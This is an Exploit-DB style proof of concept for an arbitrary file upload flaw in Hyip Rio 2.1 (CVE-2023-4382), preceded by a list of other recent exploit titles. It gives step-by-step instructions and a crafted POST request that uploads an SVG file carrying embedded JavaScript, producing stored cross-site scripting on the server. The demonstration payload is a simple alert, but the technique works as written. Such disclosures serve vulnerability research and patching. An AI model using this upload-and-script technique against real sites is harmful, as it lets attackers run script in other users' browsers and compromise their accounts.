
18 changes to exploits/shellcodes/ghdb DLINK DPH-400SE - Exposure of Sensitive Information FileMage Gateway 1.10.9 - Local File Inclusion Academy LMS 6.1 - Arbitrary File Upload AdminLTE PiHole 5.18 - Broken Access Control Blood Donor Management System v1.0 - Stored XSS Bus Reservation System 1.1 - Multiple-SQLi Credit Lite 1.5.4 - SQL Injection CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' ) CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery') Hyip Rio 2.1 - Arbitrary File Upload Member Login Script 3.3 - Client-side desync SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Webedition CMS v2.9.8.8 - Stored XSS Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Webedition CMS v2.9.8.8 - Stored XSS WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated) Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow Kingo ROOT 1.5.8 - Unquoted Service Path NVClient v5.0 - Stack Buffer Overflow (DoS) Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
49 lines
No EOL
1.6 KiB
Text
49 lines
No EOL
1.6 KiB
Text
# Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload
|
|
# Exploit Author: CraCkEr
|
|
# Date: 30/07/2023
|
|
# Vendor: tdevs
|
|
# Vendor Homepage: https://tdevs.co/
|
|
# Software Link: https://hyiprio-feature.tdevs.co/
|
|
# Version: 2.1
|
|
# Tested on: Windows 10 Pro
|
|
# Impact: Allows User to upload files to the web server
|
|
# CVE: CVE-2023-4382
|
|
|
|
|
|
## Description
|
|
|
|
Allows Attacker to upload malicious files onto the server, such as Stored XSS
|
|
|
|
|
|
## Steps to Reproduce:
|
|
|
|
1. Login as a [Normal User]
|
|
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings
|
|
3. Upload any Image into the [avatar]
|
|
4. Capture the POST Request with [Burp Proxy Intercept]
|
|
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
|
|
|
|
-----------------------------------------------------------
|
|
POST /user/settings/profile-update HTTP/2
|
|
|
|
Content-Disposition: form-data; name="avatar"; filename="XSS.svg"
|
|
Content-Type: image/png
|
|
|
|
<?xml version="1.0" standalone="no"?>
|
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
|
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
|
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
|
<script type="text/javascript">
|
|
alert("XSS by Skalvin");
|
|
</script>
|
|
</svg>
|
|
-----------------------------------------------------------
|
|
|
|
6. Send the Request
|
|
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link
|
|
8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg
|
|
|
|
|
|
|
|
[-] Done |